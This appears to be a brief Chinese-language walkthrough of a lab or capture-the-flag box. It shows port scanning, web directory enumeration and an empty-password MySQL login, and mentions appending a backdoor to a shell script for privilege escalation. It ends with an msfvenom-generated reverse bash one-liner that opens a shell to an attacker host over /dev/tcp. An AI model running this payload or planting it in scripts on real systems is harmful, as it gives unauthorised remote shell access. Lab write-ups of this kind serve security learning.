主机层面扫描:
╰─ nmap -p1-65535 -sV -A 10.10.202.130
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MySQL 5.5.60-MariaDB
web目录枚举
╰─ dirb http://10.10.202.130/
---- Scanning URL: http://10.10.202.130/ ----
+ http://10.10.202.130/cgi-bin/ (CODE:403|SIZE:210)
+ http://10.10.202.130/info.php (CODE:200|SIZE:47537)
暂时么有可用信息
尝试登录MySQL,空密码登录成功
SSH 登录尝试提权
追加后门脚本到此shell脚本中去,即可
╰─ msfvenom -p cmd/unix/reverse_bash lhost=10.10.202.145 lport=1234 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 67 bytes
0<&175-;exec 175<>/dev/tcp/10.10.202.145/1234;sh <&175 >&175 2>&175
完!